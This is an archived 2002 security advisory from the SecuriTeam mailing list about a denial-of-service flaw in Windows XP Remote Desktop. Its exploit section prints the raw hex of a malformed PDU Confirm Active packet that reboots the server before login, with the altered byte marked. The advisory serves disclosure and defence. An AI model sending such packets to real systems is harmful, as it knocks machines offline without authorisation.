[NT] Microsoft Windows XP Remote Desktop Denial of Service Vulnerability

From: support@securiteam.com
Date: 09/18/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Wed, 18 Sep 2002 14:25:55 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Microsoft Windows XP Remote Desktop Denial of Service Vulnerability
------------------------------------------------------------------------

SUMMARY

Windows XP Professional has a remote denial of service attack when Remote
Desktop is enabled. Remote Desktop is XP Professional's single-user RDP
server (Terminal Services).

DETAILS

Vulnerable systems:
 * Microsoft Windows XP Professional
 * Microsoft Windows .NET Standard Server Beta 3

Immune systems:
 * Microsoft Windows 2000 Server

At the start of the protocol, there is a negotiation of client and server
graphics capabilities, in a packet called PDU Confirm Active. A block of
32 bytes in this packet allows the client to disable the drawing commands
that it does not support.

One of these apparently controls whether the Pattern BLT command is sent.
On Windows 2000 Server, disabling this command will make the server send
bitmaps instead of Pattern BLT commands. However, Windows XP Professional
apparently reboots when it tries to render patterns; since this happens
while the login screen is being drawn, this does not require the client to
have logged on or authenticated to the server. This applies to all
versions of the protocol tested (RDP 4.0, 5.0 and 5.1), and it is
reproducible with Windows .NET Standard Server Beta 3.

Workaround:
Disable Remote Desktop (from Control Panel, System, Remote, Remote
Desktop, deselect the option "Allow users to connect remotely to this
computer").

Exploit:
Shown below are the unencrypted packet contents for the problematic PDU
Confirm Active packet. The only change is from 01 to 00 on the line
indicated.

c4 01 13 00 f0 03 ea 03 01 00 ea 03 06 00 ae 01
4d 53 54 53 43 00 11 00 00 00 01 00 18 00 01 00
03 00 00 02 00 00 00 00 05 04 00 00 00 00 00 00
00 00 02 00 1c 00 08 00 01 00 01 00 01 00 00 05
00 04 00 00 01 00 01 00 00 00 01 00 00 00 03 00
58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 01 00 14 00 00 00 01 00 00 00
2a 00 01 00 01 01 01 00 00 01 01 01 00 01 00 00 <- was "2a 00 01 01"
00 01 01 01 01 01 01 01 01 00 01 01 01 00 00 00
00 00 a1 06 00 00 00 00 00 00 00 84 03 00 00 00
00 00 e4 04 00 00 13 00 28 00 01 00 00 03 78 00
00 00 78 00 00 00 f3 09 00 80 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00
08 00 06 00 00 00 07 00 0c 00 00 00 00 00 00 00
00 00 05 00 0c 00 00 00 00 00 02 00 02 00 08 00
0a 00 01 00 14 00 15 00 09 00 08 00 00 00 00 00
0d 00 58 00 05 00 08 00 09 08 00 00 04 00 00 00
00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 0c 00 08 00 01 00 00 00
0e 00 08 00 01 00 00 00 10 00 34 00 fe 00 04 00
fe 00 04 00 fe 00 08 00 fe 00 08 00 fe 00 10 00
fe 00 20 00 fe 00 40 00 fe 00 80 00 fe 00 00 01
40 00 00 08 00 01 00 01 03 00 00 00 0f 00 08 00
01 00 00 00 11 00 0c 00 01 00 00 00 00 0a 64 00
14 00 08 00 01 00 00 00 15 00 0c 00 01 00 00 00
00 0a 00 01

References:
Section 8.2.5 from T.128 Multipoint application sharing, Series T:
Terminals for telematic services, ITU-T.

Vendor status:
Microsoft was notified on 16 April 2002.

ADDITIONAL INFORMATION

The information has been provided by <mailto:bc@skygate.co.uk> Ben Cohen.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • Re: upgrading frm XP Home to Pro
    ... Why do you think you need Windows XP Professional? ... won't and we need to upgrade all the computers to Pro. ... You bought a server to 'network your computers' and so you can ... software) would give you the same abilities as 'Remote Desktop' ...
    (microsoft.public.windowsxp.general)
  • SecurityFocus Microsoft Newsletter #139
    ... OFF any Windows 2000 Managed Dedicated Hosting Solution from Interland. ... Sun ONE Application Server Plaintext Password Vulnerability ... Batalla Naval Remote Buffer Overflow Vulnerability ...
    (Focus-Microsoft)
  • Re: DNS CORRUPT AND ALL SYSTEMS DOWN
    ... DHCP Server ... Remote Access Connection Manager ... Windows Internet Name Service ...
    (microsoft.public.windows.server.dns)
  • RE: sshd for windows
    ... As is Windows Terminal Services and Remote Desktop. ... looking for a way to log in remotely to a Windows 2000 server. ... > The Gartner Group just put Neoteris in the top of its Magic Quadrant, ...
    (Security-Basics)
  • Re: DNS CORRUPT AND ALL SYSTEMS DOWN
    ... > DHCP Server ... > Remote Access Connection Manager ... > Windows Internet Name Service ...
    (microsoft.public.windows.server.dns)